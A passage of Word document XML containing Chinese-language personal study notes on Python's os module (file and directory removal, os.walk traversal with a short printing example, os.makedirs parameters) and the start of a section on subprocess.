    <w:p w14:paraId="7CEB223F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="494" w:name="_Toc159779935"/>
      <w:bookmarkStart w:id="495" w:name="OLE_LINK21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.remove:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除非目录的文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="494"/>
    </w:p>
    <w:bookmarkEnd w:id="495"/>
    <w:p w14:paraId="638DC58B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E04CAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">os.remove()Python </w:t>
      </w:r>
      <w:r>
        <w:t>中的方法用于移除或删除文件路径。此方法不能移除或删除目录。如果指定的路径是目录，则该方法将引发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OSError </w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>os.rmdir()</w:t>
      </w:r>
      <w:r>
        <w:t>可用于删除目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA40E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C865F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="496" w:name="_Toc159779936"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>os.rmdir:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除目录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="496"/>
    </w:p>
    <w:p w14:paraId="22FB6C60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>os.rmdir()</w:t>
      </w:r>
      <w:r>
        <w:t>可用于删除目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22795D98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25085079" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="497" w:name="_Toc159779937"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.walk:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遍历子目录及文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="497"/>
    </w:p>
    <w:p w14:paraId="4B03EF49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:https://www.runoob.com/python3/python3-os-walk.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FFA3FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A43089D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遍历到哪个目录了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AE3180" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dirs: root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的子目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DADB365" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC816DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0621E8CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC5251" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1ECB76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for root, dirs, files in os.walk(".", topdown=False):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E704623" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for name in files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043F5F25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(os.path.join(root, name))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E31CB49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for name in dirs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275075E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(os.path.join(root, name))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C701B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7199C688" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">top -- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根目录下的每一个文件夹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含它自己</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>产生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (dirpath, dirnames, filenames)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【文件夹路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件名】。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336255AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D931B74" w14:textId="6C032058" w:rsidR="00C63FE1" w:rsidRDefault="00C63FE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7DBADE" w14:textId="164F02DA" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>topdown --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可选，为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者没有指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个目录的的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元组将比它的任何子文件夹的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元组先产生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录自上而下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>topdown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> False, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个目录的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元组将比它的任何子文件夹的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元组后产生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录自下而上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00C63FE1" w:rsidRPr="00C63FE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>个人解读</w:t>
      </w:r>
      <w:r w:rsidR="00C63FE1" w:rsidRPr="00B64B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：就是先出目录还是先出文件的事情。</w:t>
      </w:r>
      <w:r w:rsidR="00B64B9D" w:rsidRPr="00B64B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00B64B9D" w:rsidRPr="00B64B9D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>opdown=True</w:t>
      </w:r>
      <w:r w:rsidR="00B64B9D" w:rsidRPr="00B64B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就是</w:t>
      </w:r>
      <w:r w:rsidR="00B64B9D" w:rsidRPr="00B64B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>walk</w:t>
      </w:r>
      <w:r w:rsidR="00B64B9D" w:rsidRPr="00B64B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r w:rsidR="00B64B9D" w:rsidRPr="00B64B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B64B9D" w:rsidRPr="00B64B9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>先目录后文件，否则就是先文件后目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1876BB81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E040A13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">onerror -- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可选，是一个函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它调用时有一个参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OSError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例。报告这错误后，继续</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>walk,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者抛出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>walk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0335F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="423963D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">followlinks -- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则通过软链接访问目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB85AFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71878FF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="498" w:name="_Toc159779938"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mkdirs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建不存在的多层目录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="498"/>
    </w:p>
    <w:p w14:paraId="78AB2B28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.makedirs(self.mirror_dir, exist_ok=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A3865B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71662F64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>范围：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78350377" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：表示文件系统路径的类路径对象。类路径对象是表示路径的字符串或字节对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D2DB0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（可选）：一个整数值，表示新创建目录的模式。如果省略此参数，则使用默认值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Oo777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A4E13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exists_ok</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（可选）：此参数使用默认值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果目标目录已经存在，则如果其值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则会引发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，否则不会。对于值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> True </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保持目录不变。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A020C44" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回类型：此方法不返回任何值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9D4C9E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9120EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="499" w:name="_Toc159779939"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>subprocess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shlex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：命令执行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="499"/>
    </w:p>
    <w:p w14:paraId="26A890D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC96E29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">subprocess.Popen() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6993DD81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0CEAF23E" wp14:editId="71C76064">
            <wp:extent cx="3941445" cy="4431030"/>
            <wp:effectExtent l="0" t="0" r="5715" b="381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150"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3941445" cy="4431030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
